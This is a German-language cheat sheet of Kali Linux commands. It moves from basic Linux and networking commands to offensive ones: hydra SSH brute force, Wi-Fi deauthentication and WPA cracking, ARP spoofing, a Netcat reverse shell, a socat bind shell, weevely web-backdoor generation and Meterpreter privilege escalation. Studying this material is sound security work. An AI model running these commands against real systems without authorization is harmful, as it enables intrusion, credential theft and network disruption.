100 Kali Kommandos
01. Basic Linux Commands
- Zeigt das aktuelle Arbeitsverzeichnis.
- pwd
Listet Dateien und Verzeichnisse auf.
- ls
Wechselt das Verzeichnis.
- cd
Erstellt ein neues Verzeichnis.
- mkdir <dir>
Löscht eine Datei.
- rm <file>
Löscht ein Verzeichnis rekursiv.
- rm -r <dir>
Kopiert Dateien.
- cp <src> <dest>
Verschiebt oder benennt Dateien um.
- mv <src> <dest>
Erstellt eine leere Datei.
- touch <file>
Gibt den Inhalt einer Datei aus.
- cat <file>
Öffnet eine Datei im Editor Nano.
- nano <file>
Öffnet eine Datei im Editor Vim.
- vim <file>
Sucht eine Datei anhand des Namens.
- find / -name <filename>
Durchsucht eine Datei nach Textmustern.
- grep "text" <file>
Zeigt die eingaben Befehle der Shell-Historie.
- history
02. System Information Commands
Zeigt Systeminformationen.
- uname -a
Zeigt den aktuellen Benutzer.
- whoami
Zeigt UID und GID des Benutzers.
- id
Zeigt die Systemlaufzeit.
- uptime
Zeigt den belegten Festplattenplatz.
- df -h
Zeigt die Größe eines Verzeichnisses.
- du -sh <dir>
Zeigt aktive Prozesse.
- top
Listet alle Prozesse auf.
- ps aux
Beendet einen Prozess über die PID.
- kill <PID>
Interaktiver Prozessmanager.
- htop
03. User Management Commands
Erstellt einen neuen Benutzer.
- adduser <username>
Löscht einen Benutzer.
- deluser <username>
Ändert das Passwort eines Benutzers.
- passwd <username>
Fügt einen Benutzer zur sudo-Gruppe hinzu.
- usermod -aG sudo <username>
Zeigt Gruppenmitgliedschaften eines Benutzers.
- groups <username>
Ändert Dateiberechtigungen.
- chmod 777 <file>
Ändert Dateibesitzer und Gruppe.
- chown user:group <file>
04. Networking Commands
Zeigt Netzwerkinterfaces an.
- ifconfig
Zeigt IP-Adressen und Interfaces.
- ip a
Zeigt Wireless-Interfaces an.
- iwconfig
Testet Netzwerkverbindung via ICMP.
- ping <IP>
Zeigt offene Ports mit zugehörigen Prozessen.
- netstat -tulnp
Scant ein Zielsystem auf offene Ports.
- nmap <IP>
Zeigt den Routingpfad zu einem Host.
- traceroute <IP>
Lädt Daten von einer URL herunter.
- curl <URL>
Lädt eine Datei von einer URL.
- wget <URL>
Zeigt DNS-Informationen zu einer Domain.
- dig <domain>
Führt einfache DNS-Abfragen durch.
- nslookup <domain>
05. Hacking & Penetration Testing Commands
Startet die Metasploit-Konsole.
- msfconsole
Erstellt Payloads.
- msfvenom
Durchsucht Exploit-Datenbanken.
- searchsploit <exploit>
Testet SQL-Injection gegen eine URL.
- sqlmap -u <URL> --dbs
Führt SSH-Bruteforce durch.
- hydra -l user -P pass.txt <IP> ssh
Crackt Hashes mit John the Ripper.
- john --wordlist=rockyou.txt hash.txt
Aktiviert den Monitor-Modus für WLAN.
- airmon-ng start wlan0
Fängt WLAN-Pakete ab.
- airodump-ng wlan0mon
Deauthentifiziert Clients aus einem WLAN.
- aireplay-ng -0 10 -a <BSSID> wlan0mon
Crackt WPA/WPA2-Passwörter.
- aircrack-ng -w rockyou.txt -b <BSSID> <capture_file>
Crackt Hashes mit GPU.
- hashcat -m 2500 hash.txt rockyou.txt
Führt ARP-Spoofing durch.
- ettercap -T -q -i eth0
Extrahiert Bilder aus Netzwerktraffic.
- driftnet -i eth0
Zeichnet Netzwerkpakete auf.
- tcpdump -i eth0
Analysiert Netzwerkverkehr.
- tshark -i eth0
Scant Webserver auf Schwachstellen.
- nikto -h <URL>
Führt Directory-Bruteforce durch.
- gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt
Scant WordPress-Installationen auf Schwachstellen.
- wpscan --url <URL>
06. Privilege Escalation & Post-Exploitation
Zeigt sudo-Berechtigungen.
- sudo -l
Wechselt zum root-Benutzer.
- sudo su
Erstellt eine interaktive Shell in Python.
- python -c 'import pty; pty.spawn("/bin/bash")'
Startet einen Netcat-Listener.
- nc -lvnp <port>
Erstellt eine Reverse-Shell.
- nc <IP> <port> -e /bin/bash
Zeigt den aktuellen Benutzer im Meterpreter.
- meterpreter> getuid
Versucht Privilege Escalation im Meterpreter.
- meterpreter> getsystem
Überträgt Dateien via Meterpreter.
- meterpreter> upload / download <file>
Öffnet eine System-Shell im Meterpreter.
- meterpreter> shell
Schlägt mögliche Privileged Escalation Exploits vor.
- linux-exploit-suggester
07. File & Data Encryption
Verschlüsselt eine Datei mit GPG.
- gpg -c <file>
Entschlüsselt eine GPG-Datei.
- gpg -d <file.gpg>
Verschlüsselt Dateien mit OpenSSL.
- openssl enc -aes-256-cbc -salt -in <file> -out <file.enc>
Entschlüsselt mit OpenSSL AES.
- openssl enc -d -aes-256-cbc -in <file.enc> -out <file>
08. Forensics & Steganography
Extrahiert druckbare Strings aus Dateien.
- strings <file>
Analysiert Binärdateien.
- binwalk <file>
Extrahiert Dateien aus Images.
- foremost -i <image>
Zeigt Metadaten einer Datei.
- exiftool <file>
Findet versteckte Daten in Bildern.
- stegseek <stegfile>
09. Password & Hash Cracking
Erkennt Hash-Typen.
- hashid <hash>
Bruteforced SSH-Zugänge.
- hydra -L users.txt -P passwords.txt ssh://<IP>
Crackt Passwort-Hashes.
- john hash.txt --wordlist=rockyou.txt
10. Web Application Testing
Führt Directory Enumeration durch.
- dirb <URL>
Führt Web-Fuzzing durch.
- wfuzz -c -z file,wordlist.txt --hc 404 <URL>/FUZZ
Testet Webanwendungen auf XSS.
- xsssniper -u <URL>
Testet Webanwendungen auf Command Injection.
- commix --url <URL>
Startet Burp Suite.
- burpsuite
Miscellaneous
Erstellt Wordlists aus Zeichenfolgen.
- crunch 8 8 abcdefghijklmnopqrstuvwxyz
Führt nmap über Proxychains aus.
- proxychains nmap -sT -Pn <IP>
Startet Tor.
- tor
Startet einen MITM-Proxy.
- mitmproxy
Startet das Social Engineering Toolkit.
- setoolkit
Erstellt eine Wordlist aus einer Webseite.
- cewl -w words.txt -d 5 <URL>
Erstellt einen Web-Backdoor mit weevely.
- weevely generate password backdoor.php
Startet einen bind shell via socat.
- socat TCP-LISTEN:4444,fork EXEC:/bin/bash
Zeigt Domaininformationen an.
- whois <domain>
Sammelt Mails und Subdomains zu einer Domain.
- theHarvester -d <domain> -l 100 -b google
Crackt ZIP-Passwörter.
- fcrackzip -u -D -p rockyou.txt <file.zip>
Sucht Subdomains.
- dnsmap -d <domain>